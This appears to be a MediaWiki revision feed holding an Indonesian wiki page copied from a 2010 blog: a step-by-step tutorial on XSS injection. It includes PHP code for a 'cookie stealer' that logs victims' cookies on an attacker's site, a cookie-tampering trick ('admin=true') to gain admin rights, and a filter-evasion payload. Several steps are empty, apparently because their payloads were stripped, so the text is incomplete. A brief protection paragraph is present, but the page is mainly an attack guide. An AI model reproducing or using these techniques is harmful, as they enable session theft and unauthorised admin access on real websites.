https://onnocenter.or.id/wiki/index.php?action=history&feed=atom&title=Injeksi_XSS_Ke_Dalam_WebsiteInjeksi XSS Ke Dalam Website - Revision history2026-04-23T02:08:24ZRevision history for this page on the wikiMediaWiki 1.35.4https://onnocenter.or.id/wiki/index.php?title=Injeksi_XSS_Ke_Dalam_Website&diff=24250&oldid=prevOnnowpurbo: New page: Sumber: http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html Posted by Ujie Caprone on 03.56 Sebelumn memulai kita cek dulu web tersebut bisa di injeksi atau tidak ...2011-01-04T13:10:43Z<p>New page: Sumber: http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html Posted by Ujie Caprone on 03.56 Sebelumn memulai kita cek dulu web tersebut bisa di injeksi atau tidak ...</p>
<p><b>New page</b></p><div>Sumber: http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html<br />
<br />
Posted by Ujie Caprone on 03.56<br />
<br />
Sebelumn memulai kita cek dulu web tersebut bisa di injeksi atau tidak caranya ada di step 2<br />
<br />
==Step 1==<br />
<br />
/*Ethernets Cookie Stealer */<br />
/*Put this up on your free site */<br />
$cookie = $_GET['cookie'];<br />
$log = fopen("xssed.txt","a");<br />
fwrite($log, $cookie ."\n");<br />
fclose($log);<br />
?><br />
<br />
save => stealer.php<br />
<br />
==Step2==<br />
<br />
Untuk pengecekan apakah bisa di inject xss gunain javascriptnya<br />
<br />
Selanjutnya kalau misalkan web tersebut bisa di injeksi karena ada alert yg muncul...<br />
<br />
==Step 3==<br />
<br />
<br />
==step 4==<br />
Nah buka xssed.txtnya deh<br />
<br />
==step 5==<br />
Cookie Manipulation:<br />
<br />
Ni cuman contoh aja<br />
Terkadang lo bakan melihat cookie yang terlihat seperti:<br />
<br />
Admin=false;<br />
Or<br />
Logged_in=true;<br />
<br />
Jangan binggung gunain javascriptnya<br />
<br />
Javascript:alert(document.cookie);<br />
<br />
Keterangan<br />
<br />
Ini akan membuat sebuah kotak yang berisi peringatan<br />
bahwa telah menerima. Untuk kepentingan ini demonstrasi, mari kita<br />
katakan cookie terlihat seperti ini<br />
<br />
Logged_in=true, admin=false, fusionid=12312313<br />
<br />
Jadi, satu-satunya bagian yang sangat penting bagi qt adalah “admin = false”, sisanya adalah non-sense bahwa kita tidak perlu khawatir tentang. Tentunya, lo mungkin menemukan wont terlalu banyak situs web , tapi ini hanya dimaksudkan untuk memberikan dasar-dasar cara this.Obviously, kita dapat melihat bahwa jika kita ajukan ke cookie “admin = true” kita akan memiliki hak administratif. Dengan ini berikutnya sederhana JavaScript injeksi qt dapat mengubah cookienya menjadi.<br />
<br />
Javascript:void(document.cookie=“admin=true”);<br />
<br />
js di atas a/ hak administratif<br />
<br />
Perlindungan:<br />
<br />
“Jangan pernah percaya masukan pengguna dan selalu metakarakter penyaring”. Anda dapat menyaring JS atau HTML encode js. Pengalaman sebagai pengguna selalu mencoba untuk menghindari pergi ke luar adalah setiap link yang terhubung ke host lain. Hal ini dapat memecahkan 90% dari masalah terjangkitnya xss di web lo<br />
Agar xss lo aman dr ripper bisa gunain string char code<br />
dapat di inject dengan js<br />
<br />
/";alert(String.fromCharCode(88,83,83))<br />
translate=>88,83,83 =>XSS<br />
<br />
Source: Binus Hacker<br />
<br />
<br />
==Referensi==<br />
<br />
* http://ujie-caprone.blogspot.com/2010/05/injeksi-xss-ke-dalam-website.html<br />
<br />
<br />
==Pranala Menarik==<br />
<br />
* [[Keamanan Jaringan]]<br />
<br />
[[Category: Network Security]]</div>Onnowpurbo